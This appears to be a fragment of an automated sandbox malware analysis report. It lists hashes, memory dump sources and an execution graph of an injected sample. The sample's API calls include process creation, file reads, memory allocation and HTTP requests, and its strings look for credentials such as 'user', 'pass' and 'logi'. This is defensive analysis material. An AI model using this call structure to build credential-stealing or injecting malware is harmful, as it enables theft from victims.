                                          • Instruction Fuzzy Hash: 6031D131614A1C8FCB18EFA8D8887EEB7E1FB58305F40462ED45ED7280DE749A45C789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 0-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 75d1d95a47e5991358bc3cb7c6b1faf28292f8f39c1a8d638d741058cfcc8492
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: E821C330A10A1C8ACB19EFA8D8447EE7BE1FF58304F40462ED45AD7280DE749A058789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$l$l$t
                                          • API String ID: 0-168566397
                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                          • Instruction ID: a44b73b897b831d7d8758ed42f12516256e4740ee038f181c7bdc5e423831b01
                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                          • Instruction Fuzzy Hash: CF217C70A24B1D9BDB48EFA8D0447EEBBF1FB58300F504A2ED019D3650DB7499518B88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$l$l$t
                                          • API String ID: 0-168566397
                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                          • Instruction ID: 466dba2ed33f5434a1090e1b4c88d11abfda453ef94a50df83ddd6f615c34ef5
                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                          • Instruction Fuzzy Hash: DA218B70A24A1D9BDB48EFA8E0447EEBBF1FB58300F504A2ED019D3680DB7499518B88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: auth$logi$pass$user
                                          • API String ID: 0-2393853802
                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                          • Instruction ID: af0ab2e8aefb2fb5de7fbf4c6139f8863f88c0b46773d32dfe7edd6a882cc79f
                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                          • Instruction Fuzzy Hash: 1821C030624B0D8BCB09DF99E8906EFB7E1EF88344F004619E40ADB384D7B1D9548BC6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.1%
                                          Dynamic/Decrypted Code Coverage:1.9%
                                          Signature Coverage:0%
                                          Total number of Nodes:647
                                          Total number of Limit Nodes:84
85490->85081 85492->85480 85493->85490 85495 2a7b1f0 85494->85495 85496 2a7b040 LdrLoadDll 85495->85496 85497 2a7b204 85496->85497 85497->85011 85499 2a7af34 85498->85499 85571 2a89c90 LdrLoadDll 85499->85571 85501 2a7af6e 85501->85013 85503 2a7f3ac 85502->85503 85504 2a7b1c0 LdrLoadDll 85503->85504 85505 2a7f3be 85504->85505 85572 2a7f290 85505->85572 85508 2a7f3f1 85511 2a7f402 85508->85511 85513 2a8a490 2 API calls 85508->85513 85509 2a7f3d9 85510 2a7f3e4 85509->85510 85512 2a8a490 2 API calls 85509->85512 85510->85016 85511->85016 85512->85510 85513->85511 85515 2a7f43c 85514->85515 85591 2a7b2b0 85515->85591 85517 2a7f44e 85518 2a7f290 3 API calls 85517->85518 85519 2a7f45f 85518->85519 85520 2a7f469 85519->85520 85522 2a7f481 85519->85522 85523 2a8a490 2 API calls 85520->85523 85524 2a7f474 85520->85524 85521 2a7f492 85521->85018 85522->85521 85525 2a8a490 2 API calls 85522->85525 85523->85524 85524->85018 85525->85521 85527 2a7caa6 85526->85527 85528 2a7cab0 85526->85528 85527->85027 85529 2a7af10 LdrLoadDll 85528->85529 85530 2a7cb4e 85529->85530 85531 2a7cb74 85530->85531 85532 2a7b040 LdrLoadDll 85530->85532 85531->85027 85533 2a7cb90 85532->85533 85534 2a84a50 8 API calls 85533->85534 85535 2a7cbe5 85534->85535 85535->85027 85537 2a7d646 85536->85537 85538 2a7b040 LdrLoadDll 85537->85538 85539 2a7d65a 85538->85539 85595 2a7d310 85539->85595 85541 2a7908b 85542 2a7cc00 85541->85542 85543 2a7cc26 85542->85543 85544 2a7b040 LdrLoadDll 85543->85544 85545 2a7cca9 85543->85545 85544->85545 85546 2a7b040 LdrLoadDll 85545->85546 85547 2a7cd16 85546->85547 85548 2a7af10 LdrLoadDll 85547->85548 85549 2a7cd7f 85548->85549 85550 2a7b040 LdrLoadDll 85549->85550 85551 2a7ce2f 85550->85551 85551->85040 85554 2a78d14 85552->85554 85626 2a7f6d0 85552->85626 85565 2a78f25 85554->85565 85631 2a843a0 85554->85631 85556 2a78d70 85556->85565 85634 2a78ab0 85556->85634 85559 2a8cf30 2 API calls 85560 2a78db2 85559->85560 85561 2a8d060 3 API calls 85560->85561 85566 2a78dc7 
85561->85566 85562 2a77ea0 4 API calls 85562->85566 85565->84996 85566->85562 85566->85565 85567 2a78160 2 API calls 85566->85567 85568 2a7c7b0 18 API calls 85566->85568 85640 2a7f670 85566->85640 85644 2a7f080 21 API calls 85566->85644 85567->85566 85568->85566 85569->85022 85570->85037 85571->85501 85573 2a7f2aa 85572->85573 85581 2a7f360 85572->85581 85574 2a7b040 LdrLoadDll 85573->85574 85575 2a7f2cc 85574->85575 85582 2a89f40 85575->85582 85577 2a7f30e 85585 2a89f80 85577->85585 85580 2a8a490 2 API calls 85580->85581 85581->85508 85581->85509 85583 2a8af60 LdrLoadDll 85582->85583 85584 2a89f5c 85583->85584 85584->85577 85586 2a8af60 LdrLoadDll 85585->85586 85587 2a89f9c 85586->85587 85590 4d935c0 LdrInitializeThunk 85587->85590 85588 2a7f354 85588->85580 85590->85588 85592 2a7b2d7 85591->85592 85593 2a7b040 LdrLoadDll 85592->85593 85594 2a7b313 85593->85594 85594->85517 85596 2a7d327 85595->85596 85604 2a7f710 85596->85604 85600 2a7d39b 85601 2a7d3a2 85600->85601 85617 2a8a2a0 LdrLoadDll 85600->85617 85601->85541 85603 2a7d3b5 85603->85541 85605 2a7f735 85604->85605 85606 2a79c10 LdrLoadDll 85605->85606 85607 2a7f740 85606->85607 85618 2a781a0 85607->85618 85609 2a7d36f 85614 2a8a6e0 85609->85614 85610 2a7f759 85610->85609 85611 2a84a50 8 API calls 85610->85611 85613 2a8bdc0 2 API calls 85610->85613 85625 2a7f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 85610->85625 85611->85610 85613->85610 85615 2a8af60 LdrLoadDll 85614->85615 85616 2a8a6ff CreateProcessInternalW 85615->85616 85616->85600 85617->85603 85619 2a7829f 85618->85619 85620 2a781b5 85618->85620 85619->85610 85620->85619 85621 2a84a50 8 API calls 85620->85621 85622 2a78222 85621->85622 85623 2a8bdc0 2 API calls 85622->85623 85624 2a78249 85622->85624 85623->85624 85624->85610 85625->85610 85627 2a84e50 LdrLoadDll 85626->85627 85628 2a7f6ef 85627->85628 85629 2a7f6f6 SetErrorMode 85628->85629 85630 2a7f6fd 85628->85630 85629->85630 85630->85554 85645 2a7f4a0 85631->85645 85633 2a843c6 
85633->85556 85635 2a78ab6 85634->85635 85636 2a8bd40 2 API calls 85635->85636 85637 2a78ad5 85636->85637 85638 2a78cea 85637->85638 85664 2a89880 85637->85664 85638->85559 85641 2a7f683 85640->85641 85712 2a89e90 85641->85712 85644->85566 85646 2a7f4bd 85645->85646 85652 2a89fc0 85646->85652 85649 2a7f505 85649->85633 85653 2a8af60 LdrLoadDll 85652->85653 85654 2a89fdc 85653->85654 85655 2a7f4fe 85654->85655 85662 4d92f30 LdrInitializeThunk 85654->85662 85655->85649 85657 2a8a010 85655->85657 85658 2a8a02c 85657->85658 85659 2a8af60 LdrLoadDll 85657->85659 85663 4d92d10 LdrInitializeThunk 85658->85663 85659->85658 85660 2a7f52e 85660->85633 85662->85655 85663->85660 85665 2a8bf90 2 API calls 85664->85665 85666 2a89897 85665->85666 85685 2a79310 85666->85685 85668 2a898b2 85669 2a898d9 85668->85669 85670 2a898f0 85668->85670 85671 2a8bdc0 2 API calls 85669->85671 85673 2a8bd40 2 API calls 85670->85673 85672 2a898e6 85671->85672 85672->85638 85674 2a8992a 85673->85674 85675 2a8bd40 2 API calls 85674->85675 85676 2a89943 85675->85676 85682 2a89be4 85676->85682 85691 2a8bd80 LdrLoadDll 85676->85691 85678 2a89bc9 85679 2a89bd0 85678->85679 85678->85682 85680 2a8bdc0 2 API calls 85679->85680 85681 2a89bda 85680->85681 85681->85638 85683 2a8bdc0 2 API calls 85682->85683 85684 2a89c39 85683->85684 85684->85638 85686 2a79335 85685->85686 85687 2a7acf0 LdrLoadDll 85686->85687 85688 2a79368 85687->85688 85690 2a7938d 85688->85690 85692 2a7cf20 85688->85692 85690->85668 85691->85678 85693 2a7cf4c 85692->85693 85694 2a8a1e0 LdrLoadDll 85693->85694 85695 2a7cf65 85694->85695 85696 2a7cf6c 85695->85696 85703 2a8a220 85695->85703 85696->85690 85700 2a7cfa7 85701 2a8a490 2 API calls 85700->85701 85702 2a7cfca 85701->85702 85702->85690 85704 2a8af60 LdrLoadDll 85703->85704 85705 2a8a23c 85704->85705 85711 4d92ca0 LdrInitializeThunk 85705->85711 85706 2a7cf8f 85706->85696 85708 2a8a810 85706->85708 85709 2a8a82f 85708->85709 85710 2a8af60 LdrLoadDll 85708->85710 85709->85700 
85710->85709 85711->85706 85713 2a89eac 85712->85713 85714 2a8af60 LdrLoadDll 85712->85714 85717 4d92dd0 LdrInitializeThunk 85713->85717 85714->85713 85715 2a7f6ae 85715->85566 85717->85715 85718 2a89080 85719 2a8bd40 2 API calls 85718->85719 85721 2a890bb 85719->85721 85720 2a8919c 85721->85720 85722 2a7acf0 LdrLoadDll 85721->85722 85723 2a890f1 85722->85723 85724 2a84e50 LdrLoadDll 85723->85724 85726 2a8910d 85724->85726 85725 2a89120 Sleep 85725->85726 85726->85720 85726->85725 85729 2a88ca0 85726->85729 85751 2a88eb0 LdrLoadDll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA 85726->85751 85730 2a88cc5 85729->85730 85732 2a88d1f 85730->85732 85752 2a8a980 85730->85752 85746 2a88e83 85732->85746 85757 2a8a9f0 85732->85757 85734 2a88d60 85734->85746 85762 2a8aa70 85734->85762 85736 2a88d8d 85737 2a88d96 85736->85737 85738 2a88da7 85736->85738 85772 2a8abd0 LdrLoadDll 85737->85772 85767 2a8aaf0 85738->85767 85741 2a88d9d 85741->85726 85742 2a88e69 85775 2a8abd0 LdrLoadDll 85742->85775 85744 2a88e7c 85776 2a8abd0 LdrLoadDll 85744->85776 85746->85726 85748 2a88db6 85748->85742 85773 2a8ab60 LdrLoadDll 85748->85773 85749 2a88e36 85749->85742 85774 2a8ab60 LdrLoadDll 85749->85774 85751->85726 85777 2a8b010 85752->85777 85755 2a8a9de 85755->85732 85756 2a8a9c3 InternetOpenA 85756->85732 85758 2a8b010 LdrLoadDll 85757->85758 85759 2a8aa2f 85758->85759 85760 2a8aa38 InternetConnectA 85759->85760 85761 2a8aa5f 85759->85761 85760->85734 85761->85734 85763 2a8aaaf 85762->85763 85764 2a8b010 LdrLoadDll 85762->85764 85765 2a8aab8 HttpOpenRequestA 85763->85765 85766 2a8aadf 85763->85766 85764->85763 85765->85736 85766->85736 85768 2a8ab2f 85767->85768 85769 2a8b010 LdrLoadDll 85767->85769 85770 2a8ab38 HttpSendRequestA 85768->85770 85771 2a8ab53 85768->85771 85769->85768 85770->85748 85771->85748 85772->85741 85773->85749 85774->85749 85775->85744 85776->85746 85778 2a8b01c 85777->85778 85779 2a8a9ba 85777->85779 85780 2a84e50 LdrLoadDll 85778->85780 
85779->85755 85779->85756 85780->85779 85781 4d92ad0 LdrInitializeThunk

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 371 2a8a3b3-2a8a3b8 372 2a8a438-2a8a459 NtReadFile 371->372 373 2a8a3ba-2a8a3bd 371->373 374 2a8a379-2a8a3b1 NtCreateFile 373->374 375 2a8a3bf 373->375 375->372
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02A84BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A84BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A8A3AD
                                          • NtReadFile.NTDLL(02A84D72,5EB65239,FFFFFFFF,02A84A31,?,?,02A84D72,?,02A84A31,FFFFFFFF,5EB65239,02A84D72,?,00000000), ref: 02A8A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateRead
                                          • String ID: .z`
                                          • API String ID: 3388366904-1441809116
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02A84BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A84BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A8A3AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(02A84D72,5EB65239,FFFFFFFF,02A84A31,?,?,02A84D72,?,02A84A31,FFFFFFFF,5EB65239,02A84D72,?,00000000), ref: 02A8A455
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(02A84D72,5EB65239,FFFFFFFF,02A84A31,?,?,02A84D72,?,02A84A31,FFFFFFFF,5EB65239,02A84D72,?,00000000), ref: 02A8A455
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A72D11,00002000,00003000,00000004), ref: 02A8A579
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A72D11,00002000,00003000,00000004), ref: 02A8A579
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(02A84D50,?,?,02A84D50,00000000,FFFFFFFF), ref: 02A8A4B5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 21b814dfd7c50dc4d0d5dd9506804573cd42cd328af95500189efc86a07e7ab1
                                          • Instruction ID: 2d5a8fe3bd765dc406a25aa635cee57e3ba70f4d51b2c1f92484c489ad6e10a0
                                          • Opcode Fuzzy Hash: 21b814dfd7c50dc4d0d5dd9506804573cd42cd328af95500189efc86a07e7ab1
                                          • Instruction Fuzzy Hash: E690027170140402F20075D8540864600158BE0305F55D011B9025665EC665D9A17131
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f5f971d2ec5e89120ba75be94ed2e4031c8c7c13ef16a15657887a8b437d6ecb
                                          • Instruction ID: bcac94d44745355762aa2b8199b07d84463be4db5ad2e84568c021a03d481658
                                          • Opcode Fuzzy Hash: f5f971d2ec5e89120ba75be94ed2e4031c8c7c13ef16a15657887a8b437d6ecb
                                          • Instruction Fuzzy Hash: 2990027170148802F2107198840474A00158BD0305F59C411B8425768D8695D9A17121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 439b83a7bbc595153145b6a461bb31a5ce2e32942dcd14a36ea878d5835570ab
                                          • Instruction ID: c635aa67a04aee8809089b62b86d9b2cf63e642691f9142e4ea95cebfb3eec50
                                          • Opcode Fuzzy Hash: 439b83a7bbc595153145b6a461bb31a5ce2e32942dcd14a36ea878d5835570ab
                                          • Instruction Fuzzy Hash: B590027170140842F20071984404B4600158BE0305F55C016B4125764D8615D9617521
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d702d58ebb896fdb453f1a777312581389b490417bcb650d2b03d1be59ed5b5f
                                          • Instruction ID: ba238281edc96160906d74ad19d247971f0c872a4af8124c70e0ccab3f6635c7
                                          • Opcode Fuzzy Hash: d702d58ebb896fdb453f1a777312581389b490417bcb650d2b03d1be59ed5b5f
                                          • Instruction Fuzzy Hash: AC90026174244152B645B198440450740169BE0245795C012B5415A60C8526E966E621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
